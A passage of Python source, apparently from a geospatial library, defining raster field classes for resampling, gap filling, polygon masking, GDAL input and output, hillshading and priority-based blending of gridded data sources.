res = min(self.dx,self.dy)
l = norm(e[1]-e[0])
samples = int(np.ceil(l/res))
return Field.value_on_edge(self,e,samples=samples,**kw)
def upsample(self,factor=2):
x = np.linspace(self.extents[0],self.extents[1],1+factor*(self.F.shape[1]-1))
y = np.linspace(self.extents[2],self.extents[3],1+factor*(self.F.shape[0]-1))
new_F = np.zeros( (len(y),len(x)) , np.float64 )
for row in range(len(y)):
for col in range(len(x)):
new_F[row,col] = 0.25 * (self.F[row//2,col//2] +
self.F[(row+1)//2,col//2] +
self.F[row//2,(col+1)//2] +
self.F[(row+1)//2,(col+1)//2])
return SimpleGrid(self.extents,new_F)
def downsample(self,factor,method='decimate'):
"""
method: 'decimate' just takes every nth sample
'ma_mean' takes the mean of n*n blocks, and is nan
and mask aware.
"""
factor = int(factor)
# use a really naive downsampling for now:
if method=='decimate':
new_F = np.array(self.F[::factor,::factor])
elif method=='ma_mean':
# if not isinstance(self.F,np.ma.core.MaskedArray):
F=self.F
nr,nc=F.shape
nr+=(-nr)%factor # pad to even multiple
nc+=(-nc)%factor # pad...
F2=np.ma.zeros((nr,nc))
F2[:]=np.nan
F2[:F.shape[0],:F.shape[1]]=F
F2=np.ma.masked_invalid(F2)
F2=F2.reshape([nr//factor,factor,nc//factor,factor])
F2=F2.transpose([0,2,1,3]).reshape([nr//factor,nc//factor,factor*factor])
new_F=F2.mean(axis=2)
else:
assert False
x,y = self.xy()
new_x = x[::factor]
new_y = y[::factor]
new_extents = [x[0],x[-1],y[0],y[-1]]
return SimpleGrid(new_extents,new_F)
## Methods to fill in missing data
def fill_by_griddata(self):
""" Basically griddata - limits the input points to the borders
of areas missing data.
Fills in everything within the convex hull of the valid input pixels.
"""
# Find pixels missing one or more neighbors:
valid = np.isfinite(self.F)
all_valid_nbrs = np.ones(valid.shape,'bool')
all_valid_nbrs[:-1,:] &= valid[1:,:] # to the west
all_valid_nbrs[1:,:] &= valid[:-1,:] # to east
all_valid_nbrs[:,:-1] &= valid[:,1:] # to north
all_valid_nbrs[:,1:] &= valid[:,:-1] # to south
missing_a_nbr = valid & (~ all_valid_nbrs )
i,j = nonzero(missing_a_nbr)
x = np.arange(self.F.shape[0])
y = np.arange(self.F.shape[1])
values = self.F[i,j]
# Try interpolating the whole field - works, but slow...
# some issue here with transpose.
# x ~ 1470 - but it's really rows
# y ~ 1519 - but it's really columns.
# so griddata takes (xi,yi,zi, x,y)
# but returns as rows,columns
# fill_data ~ [1519,1470]
# old way: fill_data = griddata(i,j,values,x,y)
fill_data = griddata(j,i,values,y,x)
self.F[~valid] = fill_data[~valid] # fill_data is wrong orientation
# Is there a clever way to use convolution here -
def fill_by_convolution(self,iterations=7,smoothing=0,kernel_size=3):
""" Better for filling in small seams - repeatedly
applies a 3x3 average filter. On each iteration it can grow
the existing data out by 2 pixels.
Note that by default there is not
a separate smoothing process - each iteration will smooth
the pixels from previous iterations, but a pixel that is set
on the last iteration won't get any smoothing.
Set smoothing >0 to have extra iterations where the regions are not
grown, but the averaging process is reapplied.
If iterations is 'adaptive', then iterate until there are no nans.
"""
kern = np.ones( (kernel_size,kernel_size) )
valid = np.isfinite(self.F)
bin_valid = valid.copy()
# newF = self.F.copy()
newF = self.F # just do it in place
newF[~valid] = 0.0
if iterations=='adaptive':
iterations=1
adaptive=True
else:
adaptive=False
i = 0
while i < iterations+smoothing:
#for i in range(iterations + smoothing):
weights = signal.convolve2d(bin_valid,kern,mode='same',boundary='symm')
values = signal.convolve2d(newF,kern,mode='same',boundary='symm')
# update data_or_zero and bin_valid
# so anywhere that we now have a nonzero weight, we should get a usable value.
# for smoothing-only iterations, the valid mask isn't expanded
if i < iterations:
bin_valid |= (weights>0)
to_update = (bin_valid & (~valid)).astype(bool)
newF[to_update] = values[to_update] / weights[to_update]
i+=1
if adaptive and (np.sum(~bin_valid)>0):
iterations += 1 # keep trying
else:
adaptive = False # we're done
# and turn the missing values back to nan's
newF[~bin_valid] = np.nan
def smooth_by_convolution(self,kernel_size=3,iterations=1):
"""
Repeatedly apply a 3x3 average filter (or other size: kernel_size).
Similar to the smoothing step of fill_by_convolution, except that
the effect is applied everywhere, not just in the newly-filled
areas.
"""
kern = np.ones( (kernel_size,kernel_size) )
valid = np.isfinite(self.F)
# avoid nan contamination - set these to zero
self.F[~valid] = 0.0
for i in range(iterations):
weights = signal.convolve2d(valid, kern,mode='same',boundary='symm')
values = signal.convolve2d(self.F,kern,mode='same',boundary='symm')
# update data_or_zero and bin_valid
# so anywhere that we now have a nonzero weight, we should get a usable value.
self.F[valid] = values[valid] / weights[valid]
# and turn the missing values back to nan's
self.F[~valid] = np.nan
def polygon_mask(self,poly,crop=True,return_values=False):
""" similar to mask_outside, but:
much faster due to outsourcing tests to GDAL
returns a boolean array same size as self.F, with True for
pixels inside the polygon.
crop: if True, optimize by cropping the source raster first. should
provide identical results, but may not be identical due to roundoff.
return_vales: if True, rather than returning a bitmask the same size
as self.F, return just the values of F that fall inside poly. This
can save space and time when just extracting a small set of values
from large raster
"""
# could be made even simpler, by creating OGR features directly from the
# polygon, rather than create a full-on datasource.
# likewise, could jump straight to creating a target raster, rather
# than creating a SimpleGrid just to get the metadata right.
if crop:
xyxy=poly.bounds
xxyy=[xyxy[0], xyxy[2], xyxy[1], xyxy[3]]
indexes=self.rect_to_indexes(xxyy)
cropped=self.crop(indexes=indexes)
ret=cropped.polygon_mask(poly,crop=False,return_values=return_values)
if return_values:
return ret # done!
else:
mask_crop=ret
full_mask=np.zeros(self.F.shape,np.bool)
min_row,max_row,min_col,max_col = indexes
full_mask[min_row:max_row+1,min_col:max_col+1]=mask_crop
return full_mask
from . import wkb2shp
raster_ds=self.write_gdal('Memory')
poly_ds=wkb2shp.wkb2shp("Memory",[poly])
target_field=SimpleGrid(F=np.zeros(self.F.shape,np.int32),
extents=self.extents)
target_ds = target_field.write_gdal('Memory')
# write 1000 into the array where the polygon falls.
gdal.RasterizeLayer(target_ds,[1],poly_ds.GetLayer(0),None,None,[1000],[])
new_raster=GdalGrid(target_ds)
ret=new_raster.F>0
if return_values:
return self.F[ret]
else:
return ret
def mask_outside(self,poly,value=np.nan,invert=False,straddle=None):
""" Set the values that fall outside the given polygon to the
given value. Existing nan values are untouched.
Compared to polygon_mask, this is slow but allows more options on
exactly how to test each pixel.
straddle: if None, then only test against the center point
if True: a pixel intersecting the poly, even if the center is not
inside, is accepted.
[future: False: reject straddlers]
"""
if prep:
poly = prep(poly)
X,Y = self.xy()
rect=np.array([[-self.dx/2.0,-self.dy/2.0],
[self.dx/2.0,-self.dy/2.0],
[self.dx/2.0,self.dy/2.0],
[-self.dx/2.0,self.dy/2.0]])
for col in range(len(X)):
# print("%d/%d"%(col,len(X)))
for row in range(len(Y)):
if np.isfinite(self.F[row,col]):
if straddle is None:
p = geometry.Point(X[col],Y[row])
if (not poly.contains(p)) ^ invert:# i hope that's the right logic
self.F[row,col] = value
elif straddle:
p = geometry.Polygon( np.array([X[col],Y[row]])[None,:] + rect )
if (not poly.intersects(p)) ^ invert:
self.F[row,col] = value
def write(self,fname):
fp = open(fname,'wb')
pickle.dump( (self.extents,self.F), fp, -1)
fp.close()
def to_rgba(self,cmap='jet',vmin=None,vmax=None):
"""
map scalar field to pseudocolor rgba.
"""
if cm is None:
raise Exception("No matplotlib - can't map to RGB")
if vmin is None:
vmin = self.F.min()
if vmax is None:
vmax = self.F.max()
cmap=cm.get_cmap(cmap) # e.g. 'jet' => cm.jet
invalid=np.isnan(self.F)
fscaled = (self.F-vmin)/(vmax-vmin)
fscaled[invalid]=0
frgba = (cmap(fscaled)*255).astype(np.uint8)
frgba[invalid,:3]=255
frgba[invalid,3]=0
return SimpleGrid(extents=self.extents,F=frgba,projection=self.projection())
def write_gdal_rgb(self,output_file,**kw):
if len(self.F.shape)==2:
# As a convenience convert to RGBA then write
return self.to_rgba(**kw).write_gdal_rgb(output_file)
# Create gtif
driver = gdal.GetDriverByName("GTiff")
dst_ds = driver.Create(output_file, self.F.shape[1], self.F.shape[0], 4, gdal.GDT_Byte,
["COMPRESS=LZW"])
frgba=self.F
# assumes that nodata areas are already transparent, or somehow dealt with.
# top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution
# Gdal wants pixel-edge extents, but what we store is pixel center extents...
dx,dy = self.delta()
# Some GDAL utilities function better if the output is in image coordinates, so flip back
# if needed
if dy > 0:
# print "Flipping to be in image coordinates"
dy = -dy
frgba = frgba[::-1,:,:]
dst_ds.SetGeoTransform( [ self.extents[0]-0.5*dx, dx,
0, self.extents[3]-0.5*dy, 0, dy ] )
# set the reference info
if self.projection() is not None:
srs = osr.SpatialReference()
srs.SetWellKnownGeogCS(self.projection())
dst_ds.SetProjection( srs.ExportToWkt() )
# write the band
for band in range(4):
b1 = dst_ds.GetRasterBand(band+1)
b1.WriteArray(frgba[:,:,band])
dst_ds.FlushCache()
gdalwarp = "gdalwarp" # path to command
def warp_to_match(self,target):
"""
Given a separte field trg, warp this one to match pixel for pixel.
self and target should have meaningful projection().
"""
# adjust for GDAL wanting to pixel edges, not
# pixel centers
halfdx = 0.5*target.dx
halfdy = 0.5*target.dy
te = "-te %f %f %f %f "%(target.extents[0]-halfdx,target.extents[2]-halfdy,
target.extents[1]+halfdx,target.extents[3]+halfdy)
ts = "-ts %d %d"%(target.F.T.shape)
return self.warp(target.projection(),
extra=te + ts)
def warp(self,t_srs,s_srs=None,fn=None,extra=""):
""" interface to gdalwarp
t_srs: string giving the target projection
s_srs: override current projection of the dataset, defaults to self._projection
fn: if set, the result will retained, written to the given file. Otherwise
the transformation will use temporary files. opts: other
extra: other options to pass to gdalwarp
"""
tmp_src = tempfile.NamedTemporaryFile(suffix='.tif',delete=False)
tmp_src_fn = tmp_src.name ; tmp_src.close()
if fn is not None:
tmp_dest_fn = fn
else:
tmp_dest = tempfile.NamedTemporaryFile(suffix='.tif',delete=False)
tmp_dest_fn = tmp_dest.name
tmp_dest.close()
s_srs = s_srs or self.projection()
self.write_gdal(tmp_src_fn)
output=subprocess.check_output("%s -s_srs '%s' -t_srs '%s' -dstnodata 'nan' %s %s %s"%(self.gdalwarp,s_srs,t_srs,
extra,
tmp_src_fn,tmp_dest_fn),
shell=True)
self.last_warp_output=output # dirty, but maybe helpful
result = GdalGrid(tmp_dest_fn)
os.unlink(tmp_src_fn)
if fn is None:
os.unlink(tmp_dest_fn)
return result
def write_gdal(self,output_file,nodata=None,overwrite=False,options=None):
""" Write a Geotiff of the field.
if nodata is specified, nan's are replaced by this value, and try to tell
gdal about it.
if output_file is "Memory", will create an in-memory GDAL dataset and return it.
"""
in_memory= (output_file=='Memory')
if not in_memory:
# Create gtif
driver = gdal.GetDriverByName("GTiff")
if options is None:
options=["COMPRESS=LZW"]
else:
driver = gdal.GetDriverByName("MEM")
if options is None:
options=[]
if os.path.exists(output_file):
if overwrite:
os.unlink(output_file)
else:
raise Exception("File %s already exists"%output_file)
gtype = numpy_type_to_gdal[self.F.dtype.type]
dst_ds = driver.Create(output_file, self.F.shape[1], self.F.shape[0], 1, gtype,
options)
raster = self.F
if nodata is not None:
raster = raster.copy()
raster[ np.isnan(raster) ] = nodata
# top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution
# Gdal wants pixel-edge extents, but what we store is pixel center extents...
dx,dy = self.delta()
# Some GDAL utilities function better if the output is in image coordinates, so flip back
# if needed
if dy > 0:
# print "Flipping to be in image coordinates"
dy = -dy
raster = raster[::-1,:]
dst_ds.SetGeoTransform( [ self.extents[0]-0.5*dx, dx,
0, self.extents[3]-0.5*dy, 0, dy ] )
# set the reference info
if self.projection() not in ('',None):
srs = osr.SpatialReference()
if srs.SetFromUserInput(self.projection()) != 0:
log.warning("Failed to set projection (%s) on GDAL output"%(self.projection()))
dst_ds.SetProjection( srs.ExportToWkt() )
# write the band
b1 = dst_ds.GetRasterBand(1)
if nodata is not None:
b1.SetNoDataValue(nodata)
else:
# does this work?
b1.SetNoDataValue(np.nan)
b1.WriteArray(raster)
if not in_memory:
dst_ds.FlushCache()
else:
return dst_ds
def point_to_index(self,X):
X=np.asarray(X)
x = (X[...,0]-self.extents[0])/self.dx
y = (X[...,1]-self.extents[2])/self.dy
return np.array([y,x]).T
def extract_tile(self,xxyy=None,res=None,match=None,interpolation='linear',missing=np.nan):
""" Create the requested tile
xxyy: a 4-element sequence
match: another field, assumed to be in the same projection, to match
pixel for pixel.
interpolation: 'linear','quadratic','cubic' will pass the corresponding order
to RectBivariateSpline.
'bilinear' will instead use simple bilinear interpolation, which has the
added benefit of preserving nans.
missing: the value to be assigned to parts of the tile which are not covered
by the source data.
"""
if match is not None:
xxyy = match.extents
resx,resy = match.delta()
x,y = match.xy()
else:
if res is None:
resx = resy = self.dx
else:
resx = resy = res
xxyy=as_xxyy(xxyy)
x = np.arange(xxyy[0],xxyy[1]+resx,resx)
y = np.arange(xxyy[2],xxyy[3]+resy,resy)
myx,myy = self.xy()
if interpolation == 'bilinear':
F=self.F
def interper(y,x):
# this is taken from a stack overflow answer
# "simple-efficient-bilinear-interpolation-of-images-in-numpy-and-python"
# but altered so that x and y are 1-D arrays, and the result is a
# 2-D array (x and y as in inputs to meshgrid)
# scale those to float-valued indices into F
x = (np.asarray(x)-self.extents[0])/self.dx
y = (np.asarray(y)-self.extents[2])/self.dy
x0 = np.floor(x).astype(int)
x1 = x0 + 1
y0 = np.floor(y).astype(int)
y1 = y0 + 1
x0 = np.clip(x0, 0, F.shape[1]-1)
x1 = np.clip(x1, 0, F.shape[1]-1)
y0 = np.clip(y0, 0, F.shape[0]-1)
y1 = np.clip(y1, 0, F.shape[0]-1)
Ia = F[ y0,:][:, x0 ]
Ib = F[ y1,:][:, x0 ]
Ic = F[ y0,:][:, x1 ]
Id = F[ y1,:][:, x1 ]
wa = (x1-x)[None,:] * (y1-y)[:,None]
wb = (x1-x)[None,:] * (y-y0)[:,None]
wc = (x-x0)[None,:] * (y1-y)[:,None]
wd = (x-x0)[None,:] * (y-y0)[:,None]
result = wa*Ia + wb*Ib + wc*Ic + wd*Id
result[ y<0,: ] = missing
result[ y>F.shape[0],: ] = missing
result[ :, x<0 ] = missing
result[ :, x>F.shape[1]] = missing
return result
else:
k = ['constant','linear','quadratic','cubic'].index(interpolation)
if np.any(np.isnan(self.F)):
F = self.F.copy()
F[ np.isnan(F) ] = 0.0
else:
F = self.F
# Unfortunately this doesn't respect nan values in F
interper = RectBivariateSpline(x=myy,y=myx,z=F,kx=k,ky=k)
# limit to where we actually have data:
# possible 0.5dx issues here
xbeg,xend = np.searchsorted(x,self.extents[:2])
ybeg,yend = np.searchsorted(y,self.extents[2:])
Ftmp = np.ones( (len(y),len(x)),dtype=self.F.dtype)
Ftmp[...] = missing
# This might have some one-off issues
Ftmp[ybeg:yend,xbeg:xend] = interper(y[ybeg:yend],x[xbeg:xend])
return SimpleGrid(extents=xxyy,
F=Ftmp)
def gradient(self):
""" compute 2-D gradient of the field, returning a pair of fields of the
same size (one-sided differences are used at the boundaries, central elsewhere).
returns fields: dFdx,dFdy
"""
# make it the same size, but use one-sided stencils at the boundaries
dFdx = np.zeros(self.F.shape,np.float64)
dFdy = np.zeros(self.F.shape,np.float64)
# central difference in interior:
dFdx[:,1:-1] = (self.F[:,2:] - self.F[:,:-2]) /(2*self.dx)
dFdy[1:-1,:] = (self.F[2:,:] - self.F[:-2,:]) /(2*self.dy)
# one-sided at boundaries:
dFdx[:,0] = (self.F[:,1] - self.F[:,0])/self.dx
dFdx[:,-1] = (self.F[:,-1] - self.F[:,-2])/self.dx
dFdy[0,:] = (self.F[1,:] - self.F[0,:])/self.dy
dFdy[-1,:] = (self.F[-1,:] - self.F[-2,:])/self.dy
dx_field = SimpleGrid(extents = self.extents,F = dFdx)
dy_field = SimpleGrid(extents = self.extents,F = dFdy)
return dx_field,dy_field
def hillshade_scalar(self,azimuth_deg=225,zenith_deg=45,z_factor=10):
dx,dy=self.gradient()
azimuth_rad=azimuth_deg*np.pi/180
zenith_rad=zenith_deg*np.pi/180
slope_rad = np.arctan( z_factor * np.sqrt( dx.F**2 + dy.F**2) )
aspect_rad = np.arctan2(dy.F,-dx.F)
hillshade=np.cos(zenith_rad)*np.cos(slope_rad) + \
np.sin(zenith_rad)*np.sin(slope_rad)*np.cos(azimuth_rad - aspect_rad)
return SimpleGrid(F=hillshade,extents=self.extents)
def hillshade_shader(self,**kwargs):
hs=self.hillshade_scalar(**kwargs)
Frgba=np.zeros( hs.F.shape + (4,), 'f4')
Frgba[...,3] = 1-hs.F.clip(0,1)
hs.F=Frgba
return hs
@with_plt
def plot_hillshade(self,ax=None,plot_args={},**kwargs):
shader=self.hillshade_shader(**kwargs)
ax=ax or plt.gca()
return shader.plot(ax=ax,**plot_args)
def overlay_rgba(self,other):
"""
Composite another field over self.
Requires that self and other are rgba fields.
in keeping with matplotlib rgba arrays, values can
either be [0-1] floating point or [0-255] integer.
other will be cast as needed to match self.
other must have matching resolution and extents (this function does not
currently resample to match self)
"""
assert np.allclose( self.extents, other.extents)
assert np.array_equal( self.F.shape, other.F.shape)
assert self.F.shape[2]==4
if np.issubdtype(self.F.dtype, np.floating):
Fother=other.F
if not np.issubdtype(Fother.dtype, np.floating):
Fother=(Fother/255).clip(0,1.0)
alpha=other.F[:,:,3]
my_alpha=self.F[:,:,3]
if my_alpha.min()==1.0:
inv_alpha=1.0
else:
new_alpha=alpha + my_alpha*(1-alpha)
inv_alpha=1./new_alpha
inv_alpha[ new_alpha==0 ]=0
else:
# integer
Fother=other.F
if np.issubdtype(Fother.dtype, np.floating):
alpha=other.F[:,:,3]
Fother=(Fother.clip(0,1)*255).astype(np.uint8)
if self.F[:,:,3].min()==255:
# Special case when background is opaque
inv_alpha=1.0
else:
my_alpha=(self.F[:,:,3]/255.).clip(0,1)
new_alpha=alpha + my_alpha*(1-alpha)
inv_alpha=1./new_alpha
inv_alpha[ new_alpha==0 ]=0
self.F[:,:,3]=255*new_alpha
for chan in range(3):
self.F[:,:,chan] = (self.F[:,:,chan]*(1-alpha) + other.F[:,:,chan]*alpha) * inv_alpha
@staticmethod
def read(fname):
fp = open(fname,'rb')
extents, F = pickle.load( fp )
fp.close()
return SimpleGrid(extents=extents,F=F)
class GtxGrid(SimpleGrid):
def __init__(self,filename,is_vertcon=False,missing=9999,projection='WGS84'):
""" loads vdatum style binary gtx grids
is_vertcon: when true, adjusts values from mm to m
"""
self.filename = filename
fp=open(self.filename,'rb')
ll_lat,ll_lon,delta_lat,delta_lon = np.fromstring(fp.read(4*8),'>f8')
ll_lon = (ll_lon + 180)%360. - 180
nrows,ncols = np.fromstring(fp.read(2*4),'>i4')
heights = np.fromstring(fp.read(nrows*ncols*8),'>f4').reshape( (nrows,ncols) )
heights = heights.byteswap().newbyteorder().astype(np.float64).copy() # does this fix byte order?
heights[ heights == missing ] = np.nan
if is_vertcon:
heights *= 0.001 # vertcon heights in mm
# pretty sure that the corner values from the GTX file are
# node-centered, so no need here to pass half-pixels around.
SimpleGrid.__init__(self,
extents = [ll_lon,ll_lon+(ncols-1)*delta_lon,ll_lat,ll_lat+(nrows-1)*delta_lat],
F = heights,
projection=projection)
class GdalGrid(SimpleGrid):
"""
A specialization of SimpleGrid that can load single channel and RGB
files via the GDAL library.
Use this for loading GeoTIFFs, some GRIB files, and other formats supported
by GDAL.
"""
@staticmethod
def metadata(filename):
""" Return the extents and resolution without loading the whole file
"""
gds = gdal.Open(filename)
(x0, dx, r1, y0, r2, dy ) = gds.GetGeoTransform()
nx = gds.RasterXSize
ny = gds.RasterYSize
# As usual, this may be off by a half pixel...
x1 = x0 + nx*dx
y1 = y0 + ny*dy
xmin = min(x0,x1)
xmax = max(x0,x1)
ymin = min(y0,y1)
ymax = max(y0,y1)
return [xmin,xmax,ymin,ymax],[dx,dy]
def __init__(self,filename,bounds=None,geo_bounds=None):
""" Load a raster dataset into memory.
bounds: [x-index start, x-index end, y-index start, y-index end]
will load a subset of the raster.
filename: path to a GDAL-recognize file, or an already opened GDAL dataset.
geo_bounds: xxyy bounds in geographic coordinates
"""
if isinstance(filename,gdal.Dataset):
self.gds=filename
else:
assert os.path.exists(filename),"GdalGrid: '%s' does not exist"%filename
self.gds = gdal.Open(filename)
(x0, dx, r1, y0, r2, dy ) = self.gds.GetGeoTransform()
if geo_bounds is not None:
# convert that the index bounds:
ix_start = int( float(geo_bounds[0]-x0)/dx )
ix_end = int( float(geo_bounds[1]-x0)/dx)+ 1
# careful about sign of dy
if dy>0:
iy_start = int( float(geo_bounds[2]-y0)/dy )
iy_end = int( float(geo_bounds[3]-y0)/dy ) + 1
else:
iy_start = int( float(geo_bounds[3]-y0)/dy )
iy_end = int( float(geo_bounds[2]-y0)/dy ) + 1
# clip those to valid ranges
ix_max=self.gds.RasterXSize
ix_start=max(0,min(ix_start,ix_max-1))
ix_end=max(0,min(ix_end,ix_max-1))
iy_max=self.gds.RasterYSize
iy_start=max(0,min(iy_start,iy_max-1))
iy_end=max(0,min(iy_end,iy_max-1))
bounds = [ix_start,ix_end,
iy_start,iy_end]
# print "geo bounds gave bounds",bounds
self.geo_bounds = geo_bounds
self.subset_bounds = bounds
if bounds:
A = self.gds.ReadAsArray(xoff = bounds[0],yoff=bounds[2],
xsize = bounds[1] - bounds[0],
ysize = bounds[3] - bounds[2])
# and doctor up the metadata to reflect this:
x0 += bounds[0]*dx
y0 += bounds[2]*dy
else:
A = self.gds.ReadAsArray()
# A is rows/cols !
# And starts off with multiple channels, if they exist, as the
# first index.
if A.ndim == 3:
print("Putting multiple channels as last index")
A = A.transpose(1,2,0)
# often gdal data is in image coordinates, which is just annoying.
# Funny indexing because sometimes there are multiple channels, and those
# appear as the first index:
Nrows = A.shape[0]
Ncols = A.shape[1]
if dy < 0:
# make y0 refer to the bottom left corner
# and dy refer to positive northing
y0 = y0 + Nrows*dy
dy = -dy
# this used to have the extra indices at the start,
# but I think that's wrong, as we put extra channels at the end
A = A[::-1,:,...]
# and there might be a nodata value, which we want to map to NaN
b = self.gds.GetRasterBand(1)
nodata = b.GetNoDataValue()
if nodata is not None:
if A.dtype in (np.int16,np.int32):
A[ A==nodata ] = self.int_nan
elif A.dtype in (np.uint16,np.uint32):
A[ A==nodata ] = 0 # not great...
else:
A[ A==nodata ] = np.nan
SimpleGrid.__init__(self,
extents = [x0+0.5*dx,
x0+0.5*dx + dx*(Ncols-1),
y0+0.5*dy,
y0+0.5*dy + dy*(Nrows-1)],
F=A,
projection=self.gds.GetProjection() )
def rasterize_grid_cells(g,values,dx=None,dy=None,stretch=True,
cell_mask=slice(None),match=None):
"""
g: UnstructuredGrid
values: scalar values for each cell of the grid. Must be uint16.
dx,dy: resolution of the resulting raster
stretch: use the full range of a uint16
cell_mask: bitmask of cell indices to use. values should still be full
size.
match: an existing SimpleGrid field to copy extents/shape from
returns: SimpleGrid field in memory
"""
from . import wkb2shp
dtype=np.uint16
values=values[cell_mask]
if stretch:
vmin=values.min()
vmax=values.max()
fac=1./(vmax-vmin) * (np.iinfo(dtype).max-1)
values=1+( (values-vmin)*fac ).astype(dtype)
else:
values=values.astype(np.uint16)
polys=[g.cell_polygon(c) for c in np.arange(g.Ncells())[cell_mask]]
poly_ds=wkb2shp.wkb2shp("Memory",polys,
fields=dict(VAL=values.astype(np.uint32)))
if match:
extents=match.extents
Ny,Nx=match.F.shape
else:
extents=g.bounds()
Nx=int( 1+ (extents[1]-extents[0])/dx )
Ny=int( 1+ (extents[3]-extents[2])/dy )
F=np.zeros( (Ny,Nx), np.float64)
target_field=SimpleGrid(F=F,extents=extents)
target_ds = target_field.write_gdal('Memory')
# write 1000 into the array where the polygon falls.
gdal.RasterizeLayer(target_ds,[1],poly_ds.GetLayer(0),options=["ATTRIBUTE=VAL"])
#None,None,[1000],[])
new_raster=GdalGrid(target_ds)
if stretch:
F=new_raster.F
Fnew=np.zeros(F.shape,np.float64)
Fnew = (F-1)/fac+vmin
Fnew[F==0]=np.nan
new_raster.F=Fnew
return new_raster
if ogr:
from stompy.spatial import interp_coverage
class BlenderField(Field):
""" Delegate to sub-fields, based on polygons in a shapefile, and blending
where polygons overlap.
If delegates is specified:
The shapefile is expected to have a field 'name', which is then used to
index the dict to get the corresponding field.
Alternatively, if a factory is given, it should be callable and will take a single argument -
a dict with the attributse for each source. The factory should then return the corresponding
Field.
"""
def __init__(self,shp_fn=None,delegates=None,factory=None,subset=None,
shp_data=None):
# awkward handling of cobbled together multicall - can pass either shapefile
# path or pre-parsed shapefile data.
if shp_fn is not None: # read from shapefile
self.shp_fn = shp_fn
self.shp_data=None
self.ic = interp_coverage.InterpCoverage(shp_fn,subset=subset)
else:
assert shp_data is not None
self.shp_data=shp_data
self.shp_fn=None
self.ic = interp_coverage.InterpCoverage(regions_data=shp_data,subset=subset)
Field.__init__(self)
self.delegates = delegates
self.factory = factory
self.delegate_list = [None]*len(self.ic.regions)
def bounds(self):
raise Exception("For now, you have to specify the bounds when gridding a BlenderField")
def load_region(self,i):
r = self.ic.regions[i]
if self.delegates is not None:
d = self.delegates[r.items['name']]
else:
d = self.factory( r.items )
self.delegate_list[i] = d
def value(self,X):
X=np.asanyarray(X)
print("Calculating weights")
weights = self.ic.calc_weights(X)
total_weights = weights.sum(axis=-1)
vals = np.zeros(X.shape[:-1],np.float64)
vals[total_weights==0.0] = np.nan
# iterate over sources:
for src_i in range(len(self.delegate_list)):
print("Processing layer ",self.ic.regions[src_i].identifier())
src_i_weights = weights[...,src_i]
needed = (src_i_weights != 0.0)
if needed.sum() > 0:
if self.delegate_list[src_i] is None:
self.load_region(src_i) # lazy loading
src_vals = self.delegate_list[src_i].value( X[needed] )
vals[needed] += src_i_weights[needed] * src_vals
return vals
def value_on_edge(self,e):
""" Return the interpolated value for a given line segment"""
### UNTESTED
c = e.mean(axis=0) # Center of edge
weights = self.ic.calc_weights(c)
val = 0.0 # np.zeros(X.shape[:-1],np.float64)
# iterate over sources:
for src_i in range(len(self.delegate_list)):
# print "Processing layer ",self.ic.regions[src_i].identifier()
src_i_weight = weights[src_i]
if src_i_weight != 0.0:
if self.delegate_list[src_i] is None:
self.load_region(src_i)
src_val = self.delegate_list[src_i].value_on_edge( e )
val += src_i_weight * src_val
return val
def diff(self,X):
""" Calculate differences between datasets where they overlap:
When a point has two datasets, the first is subtracted from the second.
When there are more, they alternate - so with three, you get A-B+C
Not very useful, but fast...
"""
weights = self.ic.calc_weights(X)
vals = np.zeros(X.shape[:-1],np.float64)
used = (weights!=0.0)
n_sources = used.sum(axis=-1)
# We just care about how the sources differ - if there is only
# one source then don't even bother calculating it - set all weights
# to zero.
weights[(n_sources==1),:] = 0.0 #
# iterate over sources:
for src_i in range(len(self.delegates)):
src_i_weights = weights[...,src_i]
needed = (src_i_weights != 0.0)
src_vals = self.delegates[src_i].value( X[needed] )
vals[needed] = src_vals - vals[needed]
return vals
class MultiBlender(Field):
"""
A collection of BlenderFields, separated based on a priority
field in the sources shapefile.
"""
def __init__(self,shp_fn,factory=None,priority_field='priority',
buffer_field=None):
self.priority_field=priority_field
self.shp_fn=shp_fn
self.sources=wkb2shp.shp2geom(shp_fn)
if buffer_field is not None:
self.flatten_with_buffer(buffer_field)
super(MultiBlender,self).__init__()
# This will sort low to high
self.priorities=np.unique(self.sources[self.priority_field])
self.bfs=[]
for pri in self.priorities:
subset= np.nonzero( self.sources[self.priority_field]==pri )[0]
self.bfs.append( BlenderField(shp_data=self.sources,
factory=factory,subset=subset) )
# def to_grid(self,dx,dy,bounds):
def value(self,X):
X=np.asanyarray(X)
shape_orig=X.shape
Xlin=X.reshape( [-1,2] )
V=np.nan*np.ones( len(Xlin), 'f8' )
# go in reverse order, to grab data from highest priority
# fields first.
for bf in self.bfs[::-1]:
sel=np.isnan(V)
if np.all(~sel):
break
V[sel] = bf.value(Xlin[sel])
return V.reshape( shape_orig[:-1] )
def flatten_with_buffer(self,buffer_field='buffer'):
"""
Rather then pure stacking of the rasters by priority,
automatically create some buffers between the high
priority fields and lower priority, to get some
blending
"""
sources=self.sources.copy()
priorities=np.unique(self.sources[self.priority_field])
union_geom=None # track the union of all polygons so far
from shapely.ops import cascaded_union
# higher priority layers, after being shrunk by their
# respective buffer distances, are subtracted from lower layer polygons.
# each feature's geometry is updated with the higher priority layers
# subtracted out, and then contributes its own neg-buffered geometry
# to the running union
for pri in priorities[::-1]:
# if pri<100:
# import pdb
# pdb.set_trace()
sel_idxs = np.nonzero( sources['priority'] == pri )[0]
updated_geoms=[] # just removed higher priority chunks
slimmed_geoms=[] # to be included in running unionn
for sel_idx in sel_idxs:
sel_geom=sources['geom'][sel_idx]
if union_geom is not None:
print("Updating %d"%sel_idx)
# HERE: this can come up empty
vis_sel_geom = sources['geom'][sel_idx] = sel_geom.difference( union_geom )
else:
vis_sel_geom=sel_geom
if vis_sel_geom.area > 0.0:
buff=sources[buffer_field][sel_idx]
sel_geom_slim=sel_geom.buffer(-buff)
# print("Buffering by %f"%(-buff) )
slimmed_geoms.append( sel_geom_slim )
merged=cascaded_union(slimmed_geoms) # polygon or multipolygon
if union_geom is None:
union_geom=merged
else:
union_geom=merged.union(union_geom)
self.old_sources=self.sources
sources[self.priority_field]=0.0 # no more need for priorities
valid=np.array( [ (source['geom'].area > 0.0)
for source in sources ] )
invalid_count=np.sum(~valid)
if invalid_count:
print("MultiBlenderField: %d source polygons were totally obscured"%invalid_count)
self.sources=sources[valid]
class CompositeField(Field):
"""
In the same vein as BlenderField, but following the model of raster
editors like Photoshop or the Gimp.
Individual sources are treated as an ordered "stack" of layers.
Layers higher on the stack can overwrite the data provided by layers
lower on the stack.
A layer is typically defined by a raster data source and a polygon over
which it is valid.
Each layer's contribution to the final dataset is both a data value and
